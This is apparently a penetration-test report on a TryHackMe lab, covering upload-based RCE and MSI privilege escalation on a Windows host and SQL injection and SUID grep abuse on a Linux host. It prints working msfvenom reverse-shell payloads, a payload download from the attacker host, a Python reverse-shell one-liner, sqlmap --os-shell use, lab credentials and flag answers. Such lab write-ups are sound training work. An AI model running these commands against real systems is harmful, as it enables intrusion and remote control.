Scope

Assessment Targets:

10.200.150.151 - Windows

10.200.150.152 - Linux

Testing should be performed from the internal network perspective. Both

initial access and privilege escalation are in-scope.

Vulnerability Title: Unrestricted File Upload Leading to Remote Code

Execution (RCE)

Severity: Critical (CVSS 3.1 Base Score: 9.8)

Affected Host: 10.200.150.151

Flag Value: THM{751f131b-4a89-41ba-9269-ba953a9a036f}

Description of Vulnerability:

The target web application allows users to upload files into the /uploads
directory without any restriction on file type, content, or execution behavior.
Due to an automated PowerShell watcher script on the backend, any
uploaded executable file is renamed and executed on the server, granting
attackers direct code execution capabilities. This lack of validation and
improper handling of uploaded files exposes the system to full compromise.

1. Attack Path

Step 1 – Reconnaissance
An initial full TCP port scan was conducted against the target using nmap:

nmap -p- --open 10.200.150.151 -vv -T4 -Pn

Results:

Open ports included:

443/tcp (HTTPS)

445/tcp (Microsoft-DS)

3389/tcp (RDP)

8081/tcp

47001/tcp (WinRM)

Multiple high ephemeral ports (49664–49674/tcp)

A directory brute-force scan was then performed against the HTTPS service:

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-
small.txt:FUZZ -u https://10.200.150.151/FUZZ -ic

Results:

Identified directories:

/uploads

/css

/js

The /uploads directory was publicly accessible and allowed direct file
uploads.

Step 2 – Weaponizing the File Upload

Testing revealed that the /uploads endpoint accepted files without any proper
restriction on file type or content.

A Windows reverse shell payload was generated using:

msfvenom -p windows/shell_reverse_tcp LHOST=10.250.1.6 LPORT=4444 -f

exe -o shell.exe

To bypass simple extension-based filters, the payload was renamed:

cp shell.exe shell.exe.pdf

The malicious file was successfully uploaded to /uploads without triggering

any security controls.

Step 3 – Automatic Execution via PowerShell Script

During post-exploitation analysis, a PowerShell watcher script was identified

on the server at C:\Users\hr\Documents\Task\file.ps1", configured to:

Monitor the /uploads directory in real-time.

Detect files with executable extensions (including hidden double extensions

like .exe.pdf).

Automatically copy the detected file into C:\xampp\binaries, remove the

extra extension, and execute it using Start-Process.

This automation meant that as soon as shell.exe.pdf was uploaded, it was

renamed to shell.exe and executed on the server — immediately establishing
a reverse shell connection to the attacker-controlled host.

Step 4 – Gaining Interactive Access

A netcat listener was prepared:

nc -nvlp 4444

As soon as the watcher script executed the payload, a reverse shell session
was obtained with jobify\hr privileges.

From this session:

The user.txt flag was retrieved from C:\.

A notes.txt file in C:\Users\hr\Desktop was found containing default HR

account credentials:

Account: hr

Password: TryH@cKMe9#21TryH@cKMe9#21

These credentials were successfully used to log in via RDP, providing full
desktop access.

Vulnerability Name: Privilege Escalation via Arbitrary MSI Execution

Risk Rating (Abstracted CVSS 3.1 Score): Critical (9.9)

Affected Host: 10.200.150.151

Flag Value: THM{12c1d198-ca5e-4fcf-972b-e31588e3db33}

Description of Vulnerability:

The target system allowed a low-privileged RDP user (hr) to execute arbitrary
Windows Installer (.msi) files. When executed, these MSI packages were
processed by msiexec.exe under the NT AUTHORITY\SYSTEM account due to
default Windows Installer behavior and lack of UAC/AppLocker restrictions.
This allowed for complete privilege escalation from a standard domain
account to full SYSTEM-level control.

The vulnerability arises from misconfigured privilege management and

absence of application whitelisting, permitting untrusted MSI execution
without restrictions. As a result, an attacker with basic access could run a
crafted installer to spawn a SYSTEM shell.

Initial Access

After obtaining valid RDP credentials for the hr user account (hr /
TryH@cKMe9#21TryH@cKMe9#21), an interactive desktop session was
established with the target host 10.200.150.151.

Attack Path

To escalate privileges, a malicious Windows Installer (.msi) package

containing a reverse shell payload was created using msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.250.1.6

LPORT=4444 -f msi > shell.msi

A Python HTTP server was then started on the attacker machine to host the
payload:

python3 -m http.server 8000

From within the RDP session, PowerShell was used to download the .msi
payload to the target machine:

wget http://10.250.1.6:8000/shell.msi -OutFile dhell.msi

Meanwhile, a Netcat listener was prepared on the attacker's machine:

rlwrap nc -lvnp 4444

Upon executing the .msi payload in the RDP session, the reverse shell
connected back to the attacker’s listener, providing a command shell with NT
AUTHORITY\SYSTEM privileges.

From this elevated shell, the root.txt flag was retrieved from:

type C:\Users\Administrator\root.txt

The privilege escalation was possible because MSI packages are handled by
the Windows Installer service (msiexec.exe), which runs under the
LocalSystem account. This is by design, as system-wide installations require
SYSTEM privileges to write to protected areas of the OS. So, hr user had
permissions to execute arbitrary .msi installers, which ran with elevated
privileges due to misconfigured UAC and lack of application whitelisting and
give us SYSTEM shell

Vulnerability Title: SQL Injection Leading to Remote Code Execution (RCE)

Severity: Critical (CVSS 3.1 Base Score: 9.8)

Affected Host: 10.200.150.152

FLAG: THM{0278f384-9038-432c-8371-52bc9a8837c3}

Description of the Vulnerability:

The target web application contained a SQL injection flaw in the email
parameter of the login request. Due to the absence of proper input
sanitization and reliance on dynamically constructed SQL queries, attackers
could inject arbitrary SQL commands. This weakness allowed the extraction
of sensitive data, including administrator credentials, which in turn enabled
remote code execution via SQLMap’s --os-shell feature. Exploiting this
vulnerability granted shell access to the underlying server, leading to full
compromise of application and system integrity.

Attack Path

Step 1 – Reconnaissance and Login Request Capture

The target web application at http://10.200.150.152:1200/ presented a login

form.

A login attempt was intercepted in Burp Suite and saved as req.txt:

POST /includes/user_login.php HTTP/1.1

Host: 10.200.150.152:1200

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

email=admin&password=admin

Step 2 – Exploiting SQL Injection

The intercepted request was tested for SQL injection using SQLMap:

sqlmap -r req.txt --dbms=mysql --technique=BEU --level=3 --risk=2 --batch

--dump

SQLMap successfully identified SQL injection in the email parameter and

dumped database credentials:

Username: admin@sequel.thm

Password: zxQY7tN1iUz9EJ3l8zWezxQY7tN1iUz9EJ3l8zWe

Step 3 – Backend Access via OS Shell

The discovered credentials were inserted into a new request, saved as fu.txt,
and used to gain backend command execution:

sqlmap -r fu.txt --os-shell

A shell was obtained on the target as the www-data user.

Step 4 – Reverse Shell Execution

A Python reverse shell was executed from the obtained OS shell:

python3 -c 'import socket,subprocess,os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("10.250.1.6",7777));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

import pty; pty.spawn("sh")'

Before execution, a listener was started on the attacker machine:

rlwrap nc -lvnp 7777

A stable reverse shell connection was established as www-data.

Step 5 – Flag Retrieval

The user.txt flag was read from the target:

cat /user.txt
Vulnerability Name: Privilege Escalation via Misconfigured SUID Binary
(/usr/bin/grep)

Risk Rating (Abstracted CVSS Score): High (7.8)

Affected Host: 10.200.150.152

Flag Value: THM{ca5b2dc6-8964-4440-82ef-25e90cd6692e}

Description of Vulnerability:

While operating as the low-privileged www-data user, a search was

performed for files with the SUID bit set on grep binary means owned by
root. This revealed that /usr/bin/grep was incorrectly configured with the
SUID bit. Normally, grep does not require elevated privileges, but with this
misconfiguration, any user can execute it with root privileges. By leveraging
this, it was possible to read the /root/root.txt file, which is normally restricted
to the root user, successfully obtaining the root flag.

Attack Path

After exploiting the SQL injection vulnerability and obtaining an OS shell as

the low-privileged www-data user, the attacker began enumerating the
system to identify potential privilege escalation vectors.

Step-1: SUID Binary Enumeration

A search for files with the SUID bit set and owned by root was conducted:

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

The output revealed multiple SUID binaries, including /usr/bin/grep, which is

unusual because grep does not normally require elevated privileges and can
be abused to read sensitive files.
Step-1: Abusing /usr/bin/grep for Privilege Escalation

The attacker leveraged the SUID grep binary to read the /root/root.txt file,
which is normally accessible only by the root user:

LFILE=/root/root.txt

grep '' $LFILE

This successfully returned the root flag:

THM{ca5b2dc6-8964-4440-82ef-25e90cd6692e}